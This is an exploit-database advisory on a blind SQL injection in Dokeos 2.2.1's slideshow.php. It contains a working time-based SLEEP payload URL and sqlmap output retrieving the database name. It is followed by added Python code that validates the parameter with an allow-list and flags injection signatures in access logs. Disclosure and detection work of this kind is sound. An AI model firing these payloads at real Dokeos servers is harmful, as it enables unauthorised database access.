Dokeos 2.2.1 – Blind SQL Injection

  • Author: Mormoroth
    Date: 2016-06-15
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/39952/
  • # Exploit Title: Dokeos Blind SQL Injection
    # Date: 2016-06-14
    # Exploit Author: Mormoroth
    # Exploit Author Blog: http://ha.cker.ir
    # Vendor Homepage: http://www.dokeos.com/
    # Software Link: http://jaist.dl.sourceforge.net/project/dokeos/dokeos-2.1.1.zip
    # Version: 2.2.1
    # Tested on: Ubuntu
    # Twitter : https://twitter.com/Mormoroth
    ------
    Note: hackme.com is a local domain in the lab, not a live website
    ------
    VULNERABILITY
    curdirpath in slideshow.php is vulnerable to time-based blind SQL injection
    ------
    POC :
    
    Payload: http://hackme.com:80/dokeos-2.1.1/main/document/slideshow.php?cidReq=123&curdirpath=' AND (SELECT * FROM (SELECT(SLEEP(5)))Pfag) AND 'NFwV'='NFwV&slide_id=all
    ------
    Exploiting vulnerability with Sqlmap
    Note : to exploit with sqlmap you should use --tamper=between option to retrieve data
    ------
    Parameter: #1* (URI)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: http://hackme.com:80/dokeos-2.1.1/main/document/slideshow.php?cidReq=123&curdirpath=' AND (SELECT * FROM (SELECT(SLEEP(5)))Pfag) AND 'NFwV'='NFwV&slide_id=all
    ------
    [22:25:09] [INFO] the back-end DBMS is MySQL
    web server operating system: Linux Ubuntu
    web application technology: Apache 2.4.7
    back-end DBMS: MySQL 5.0.12
    [22:25:09] [INFO] fetching current database
    [22:25:09] [INFO] resumed: dokeos_main
    current database:'dokeos_main'
    [22:25:09] [INFO] fetched data logged to text files under 'C:\Users\Mort\.sqlmap\output\hackme.com'
    
    C:\Users\Mort\Desktop\Apps\sqlmap>
    ------
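The advisory shows only the payload, not how to catch it or how the parameter should have been handled. The following is an added example (not code from the advisory, from Mormoroth, or from the Dokeos project) that does both from the defender's side: it applies an allow-list check to `curdirpath` of the kind the application should enforce server-side (a course document directory is a slash-separated path of plain characters, so a quote, a space or a parenthesis has no business in it), and it runs that check over Apache-style access-log lines to flag requests to `slideshow.php` whose `curdirpath` fails it, additionally marking the ones that carry a MySQL `SLEEP()`/`BENCHMARK()` signature. The log lines, client addresses and timestamps are constructed for the example; the first line carries the advisory's own PoC payload, percent-encoded as a client would send it.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed Apache-style access-log lines (not from the advisory). The first
# carries the PoC payload from the advisory, percent-encoded as a client would
# send it; the second is an ordinary request for a course document folder.
SAMPLE_LOG = """\
10.0.0.5 - - [14/Jun/2016:22:25:09 +0000] "GET /dokeos-2.1.1/main/document/slideshow.php?cidReq=123&curdirpath=%27%20AND%20%28SELECT%20%2A%20FROM%20%28SELECT%28SLEEP%285%29%29%29Pfag%29%20AND%20%27NFwV%27%3D%27NFwV&slide_id=all HTTP/1.1" 200 5123
10.0.0.6 - - [14/Jun/2016:22:26:01 +0000] "GET /dokeos-2.1.1/main/document/slideshow.php?cidReq=123&curdirpath=/images/week1&slide_id=all HTTP/1.1" 200 5123
"""

LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"'
)

# Allow-list for a course document directory: slash-separated segments of
# letters, digits, '_', '-' and '.', nothing else (no quotes, spaces, parens).
SAFE_PATH_RE = re.compile(r'^(/[A-Za-z0-9_.\-]+)*/?$')

# Markers of MySQL time-based blind injection: SLEEP()/BENCHMARK(), or a
# quote immediately followed by a boolean operator (as in the PoC above).
SQLI_RE = re.compile(r"(sleep\s*\(|benchmark\s*\(|'\s*(and|or)\s)", re.IGNORECASE)


def is_safe_curdirpath(value):
    """Allow-list validation a defender would apply server-side before the
    value reaches any query: shape check plus rejection of '.'/'..' segments."""
    if not SAFE_PATH_RE.match(value):
        return False
    return all(seg not in ('.', '..') for seg in value.split('/'))


def classify_request(target):
    """Split a request target and judge its curdirpath parameter.
    An absent/empty curdirpath is treated as not carrying attacker input."""
    parts = urlsplit(target)
    params = parse_qs(parts.query)          # percent-decodes the values
    curdirpath = params.get('curdirpath', [''])[0]
    return {
        'path': parts.path,
        'curdirpath': curdirpath,
        'safe': is_safe_curdirpath(curdirpath) if curdirpath else True,
        'sqli': bool(SQLI_RE.search(curdirpath)),
    }


def scan_log(text):
    """Return one finding per slideshow.php request whose curdirpath fails the
    allow-list; 'sqli' marks the ones that also carry an injection signature."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        info = classify_request(m.group('target'))
        if not info['path'].endswith('/main/document/slideshow.php'):
            continue
        if info['safe']:
            continue
        findings.append({'client': m.group('client'), 'ts': m.group('ts'), **info})
    return findings


if __name__ == '__main__':
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ts']} {f['client']} sqli={f['sqli']} curdirpath={f['curdirpath']!r}")
```

Two design points. The allow-list, not the signature regex, is what decides whether a request is flagged: a directory parameter that does not look like a directory is suspicious regardless of which DBMS function it invokes, so the detector does not depend on the attacker using `SLEEP()`; the signature is only attached to prioritise triage. The same `is_safe_curdirpath` check is what the application should run before building the query, and the parameter should then be bound with a prepared statement rather than concatenated, which is the actual fix for the flaw the advisory describes.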